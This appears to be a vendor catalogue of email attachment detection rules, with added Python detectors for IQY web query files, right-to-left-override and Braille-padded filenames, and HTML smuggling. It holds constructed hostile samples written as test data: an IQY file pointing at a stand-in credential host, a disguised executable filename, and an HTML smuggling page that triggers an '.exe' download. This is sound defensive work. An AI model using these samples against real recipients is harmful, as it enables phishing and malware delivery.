EXPLORE DETECTIONS
Attachment: Excel file with document sharing lure created by Go Excelize
Detects Excel macro files created with the Go Excelize library containing document sharing language such as 'sent document', 'shared file', or 'REVIEW DOCUMENT'. These files are often used as lures to trick users into enabling macros or downloading malicious content.
Attachment: Excel file with suspicious template identifier
Detects Excel attachments containing a specific template identifier (TM16390866) in the EXIF metadata, which may indicate malicious or suspicious document templates being used to distribute harmful content.
Attachment: Excel Web Query File (IQY)
Recursively scans files and archives to detect IQY (Excel Web Query) files. An IQY file can be used to coerce the target user into sending credentials to an attacker-controlled web server, or for SMB relaying when it points at a UNC path.
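As an added example (not the detection rule's own logic), the scanner below identifies IQY files by content rather than by extension, so a renamed query file is still caught, and descends into nested zip archives the way the rule description implies. The sample IQY bytes, the archive built around them, the 203.0.113.10 host and the depth and size limits are all constructed for this illustration.

```python
import io
import zipfile

# Constructed sample: the minimal Excel Web Query layout. Line 1 is the literal
# "WEB", line 2 a version number, line 3 the URL Excel will fetch. The host is
# a documentation address, not a real sample.
IQY_SAMPLE = b"WEB\r\n1\r\nhttp://203.0.113.10/auth/login.iqy\r\n"

# URL schemes worth flagging: HTTP(S) for credential prompts, file:// and UNC
# paths for NTLM coercion / SMB relay.
_IQY_SCHEMES = ("http://", "https://", "file://", "\\\\")


def looks_like_iqy(data: bytes) -> bool:
    """Content-based check: does this blob have the IQY header structure?"""
    lines = data.decode("latin-1").splitlines()
    if len(lines) < 3:
        return False
    return (lines[0].strip().upper() == "WEB"
            and lines[1].strip().isdigit()
            and lines[2].strip().lower().startswith(_IQY_SCHEMES))


def scan(name: str, data: bytes, depth: int = 0, max_depth: int = 5):
    """Yield (path, url) for every IQY found, recursing into zip archives.

    max_depth and the per-member size cap are assumed limits to keep a
    hostile archive (zip bomb, deep nesting) from exhausting the scanner."""
    if looks_like_iqy(data):
        yield name, data.decode("latin-1").splitlines()[2].strip()
        return
    if depth < max_depth and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir() or info.file_size > 10_000_000:
                    continue
                yield from scan(f"{name}/{info.filename}", zf.read(info),
                                depth + 1, max_depth)


def find_iqy(name: str, data: bytes) -> list:
    """Convenience wrapper returning all hits as a list."""
    return list(scan(name, data))


def build_nested_zip() -> bytes:
    """Constructed attachment: zip -> zip -> invoice.iqy, plus a benign file."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("invoice.iqy", IQY_SAMPLE)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("docs.zip", inner.getvalue())
        zf.writestr("readme.txt", b"nothing to see")
    return outer.getvalue()


if __name__ == "__main__":
    for path, url in find_iqy("attachment.zip", build_nested_zip()):
        print(f"IQY at {path} -> {url}")
```

A production scanner would add other container formats (7z, RAR, ISO, OLE) and treat a UNC or file:// target as a higher-severity hit than an HTTP one, since it coerces an NTLM authentication without any user interaction beyond opening the query.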
Attachment: Fake attachment image lure
Message (or attached message) contains an image impersonating an Outlook attachment button.
Attachment: Fake lawyer & sports agent identities
Detects messages containing attachments or content that reference known fake identities used in FC Barcelona scams, including fake lawyer Michael Gerardus Hermanus Demon and sports agents with the surname Giuffrida. The rule examines EXIF metadata, OCR text from attachments, and message body content for these specific identity markers.
Attachment: Fake scan-to-email
Message and attachment resemble an email from a scan-to-email service or device with credential theft language.
Attachment: Fake secure message and suspicious indicators
Body contains language resembling credential theft, and an attached "secure message" from an untrusted sender.
Attachment: Fake Slack installer
HTML attachment contains a Slack logo, request language, and a link to an executable. Observed in the wild.
Attachment: Fake voicemail via PDF
Identifies inbound messages containing a single-page PDF attachment related to voicemail or missed call notifications that includes either a URL or QR code.
Attachment: Fake Zoom installer
HTML attachment contains a Zoom logo, request language, and a link to an executable. Observed in the wild.
Attachment: Fictitious invoice using LinkedIn's address
Detects PDF attachments created with wkhtmltopdf or Qt that contain LinkedIn's headquarters address (1000 W Maude Ave) in financial communications context, but do not mention LinkedIn itself.
Attachment: File execution via Javascript
Javascript contains identifiers or strings that may attempt to execute files.
Attachment: Filename containing Unicode braille pattern blank character
Recursively identifies attachments that attempt to conceal their true file extension by using Braille Pattern Blank characters (U+2800), which render as empty space and push the real extension out of view.
Attachment: Filename containing Unicode right-to-left override character
Recursively identifies attachments that attempt to conceal their true file extension by using right-to-left override characters (U+202E), which reverse the display order of the characters that follow them.
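The two filename tricks above share one detection idea: compare the extension a user would see with the extension the file actually carries. The example below is added here and is not the rules' own implementation; it checks a single filename (the recursion into archives is left out), and the sample names and the helper names are constructed for the illustration.

```python
RLO = "\u202e"            # RIGHT-TO-LEFT OVERRIDE
BRAILLE_BLANK = "\u2800"  # BRAILLE PATTERN BLANK, renders as empty space


def displayed_name(name: str) -> str:
    """Approximate what a file browser renders: everything after an RLO
    is drawn right-to-left, i.e. reversed on screen."""
    if RLO in name:
        head, _, tail = name.partition(RLO)
        return head + tail[::-1]
    return name


def apparent_extension(name: str) -> str:
    """Extension the user perceives. Anything after a run of Braille blanks is
    assumed to scroll out of the visible column, so it is ignored."""
    shown = displayed_name(name).split(BRAILLE_BLANK, 1)[0]
    return shown.rsplit(".", 1)[-1].lower() if "." in shown else ""


def true_extension(name: str) -> str:
    """Extension the operating system will actually use to open the file."""
    stored = name.replace(BRAILLE_BLANK, "").replace(RLO, "")
    return stored.rsplit(".", 1)[-1].lower() if "." in stored else ""


def analyze_filename(name: str) -> dict:
    """Return the indicators a rule would act on for one attachment name."""
    apparent, true = apparent_extension(name), true_extension(name)
    return {
        "rtl_override": RLO in name,
        "braille_padding": BRAILLE_BLANK in name,
        "apparent_ext": apparent,
        "true_ext": true,
        # Flag the control characters regardless of extension: a benign
        # filename has no reason to contain either of them.
        "suspicious": RLO in name or BRAILLE_BLANK in name or apparent != true,
    }


# Constructed samples: an RLO name that reads as "invoiceexe.pdf" on screen,
# a Braille-padded name whose ".exe" sits 30 blanks to the right, and a
# benign control.
SAMPLE_RLO = "invoice" + RLO + "fdp.exe"
SAMPLE_BRAILLE = "Q3_report.pdf" + BRAILLE_BLANK * 30 + ".exe"
SAMPLE_BENIGN = "notes.pdf"

if __name__ == "__main__":
    for n in (SAMPLE_RLO, SAMPLE_BRAILLE, SAMPLE_BENIGN):
        print(repr(displayed_name(n)), analyze_filename(n))
```

The apparent extension is only a rendering approximation; a practitioner would pair this with a magic-byte check of the attachment body, since the file type, not the name, is what the operating system executes.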
Attachment: Finance themed PDF with observed phishing template
Detects PDF attachments containing a specific rectangular coordinate pattern at position [249.75 560 407.25 599.75], which may indicate a templated or malicious document structure.
Attachment: HTML attachment with Javascript location
Recursively scans files and archives to detect HTML smuggling techniques in which JavaScript manipulates the browser location.
Attachment: HTML attachment with login portal indicators
Recursively scans files and archives to detect indicators of login portals implemented in HTML files. This is a known credential theft technique used by threat actors.
Attachment: HTML file contains exclusively Javascript
Attached HTML file does not contain any HTML other than a <script> block.
Attachment: HTML file with excessive 'const' declarations and abnormally long timeouts
Detects messages with HTML attachments containing multiple 'const' declarations and abnormally long timeouts, excluding legitimate Gmail messages. These patterns are evidence of potential code injection or obfuscation techniques.
Attachment: HTML file with excessive padding and suspicious patterns
Attached HTML file contains excessive line breaks and suspicious Javascript patterns.
Attachment: HTML file with reference to recipient and suspicious patterns
Attached HTML file (or HTML file within an attached email) contains references to the recipient's email address, indicative of credential phishing, and suspicious Javascript patterns.
Attachment: HTML smuggling - QR Code with suspicious links
This rule detects messages with HTML attachments containing QR codes that resolve to suspicious links.
Attachment: HTML smuggling 'body onload' linking to suspicious destination
Potential HTML smuggling. This rule inspects HTML attachments that contain a single link and leverage an HTML body onload event. The linked domain must be in the URLhaus trusted reporters list, or have a suspicious TLD.
Attachment: HTML smuggling 'body onload' with high entropy and suspicious text
Potential HTML smuggling. This rule inspects HTML attachments that contain a body onload event, high entropy, and suspicious text.
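The three HTML attachment checks above ('HTML file contains exclusively Javascript', 'body onload' with a single link, and 'body onload' with high entropy and suspicious text) can all be built on one pass over the document. The example below is added here and is not the rules' own implementation: it parses the attachment with the standard library, computes Shannon entropy over the script bodies, and applies each check. The URLhaus reporter lookup is an online query and is replaced here by a constructed suspicious-TLD list; the lure word list, the 5.2-bit entropy threshold and all sample attachments are likewise constructed for the illustration.

```python
import base64
import math
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _Collector(HTMLParser):
    """Single pass over the HTML: tag counts, links, body onload, script and text."""

    def __init__(self):
        super().__init__()
        self.tags = Counter()
        self.hrefs = []
        self.body_onload = None
        self.scripts = []
        self.text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags[tag] += 1
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.hrefs.append(a["href"])
        if tag == "body" and a.get("onload"):
            self.body_onload = a["onload"]
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        (self.scripts if self._in_script else self.text).append(data)


def _collect(html: str) -> _Collector:
    c = _Collector()
    c.feed(html)
    c.close()
    return c


def shannon_entropy(s: str) -> float:
    """Bits per character; random base64 approaches 6, readable JS sits near 4-5."""
    n = len(s)
    return -sum(k / n * math.log2(k / n) for k in Counter(s).values()) if n else 0.0


SUSPICIOUS_TLDS = {"zip", "top", "xyz", "icu", "cam", "mov"}   # constructed list
LURE_WORDS = ("password", "sign in", "verify", "secure message")  # constructed list


def only_javascript(html: str) -> bool:
    """'HTML file contains exclusively Javascript': a <script> and nothing
    else beyond the structural wrapper tags, with no visible text."""
    c = _collect(html)
    return (c.tags["script"] >= 1
            and set(c.tags) <= {"html", "head", "body", "script"}
            and not "".join(c.text).strip())


def onload_single_link(html: str):
    """'body onload' plus exactly one link whose TLD is suspicious.
    Returns the offending host, or None."""
    c = _collect(html)
    if not c.body_onload or len(c.hrefs) != 1:
        return None
    host = (urlsplit(c.hrefs[0]).hostname or "").lower()
    return host if host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS else None


def onload_high_entropy(html: str, threshold: float = 5.2) -> bool:
    """'body onload' plus high-entropy script content plus lure text."""
    c = _collect(html)
    if not c.body_onload:
        return False
    text = "".join(c.text).lower()
    return (shannon_entropy("".join(c.scripts)) > threshold
            and any(w in text for w in LURE_WORDS))


# Constructed samples. The base64 blob stands in for a smuggled binary.
_PAYLOAD = base64.b64encode(bytes(range(256)) * 3).decode()
SAMPLE_ONLY_SCRIPT = "<script>document.write(atob('aGVsbG8='))</script>"
SAMPLE_ONLOAD_LINK = ('<html><body onload="document.getElementById(\'l\').click()">'
                      '<a id="l" href="https://login-update.top/verify">Review document</a>'
                      '</body></html>')
SAMPLE_SMUGGLE = (f'<html><body onload="run()"><p>Please sign in to view the secure message.</p>'
                  f'<script>var p="{_PAYLOAD}";function run(){{var b=atob(p);'
                  f'var a=document.createElement("a");a.download="statement.pdf.exe";a.click();}}'
                  f'</script></body></html>')
SAMPLE_BENIGN = ('<html><body onload="init()"><p>Welcome to our site</p>'
                 '<script>function init(){console.log("hi")}</script></body></html>')

if __name__ == "__main__":
    for name, s in [("only_script", SAMPLE_ONLY_SCRIPT), ("onload_link", SAMPLE_ONLOAD_LINK),
                    ("smuggle", SAMPLE_SMUGGLE), ("benign", SAMPLE_BENIGN)]:
        print(name, only_javascript(s), onload_single_link(s), onload_high_entropy(s))
```

Entropy alone is a weak signal, which is why the rule pairs it with the onload handler and lure text; a benign page that embeds a base64 image would otherwise trip it. The TLD set and the entropy threshold are tuning knobs that should be fitted to the organisation's own mail, not taken from this example.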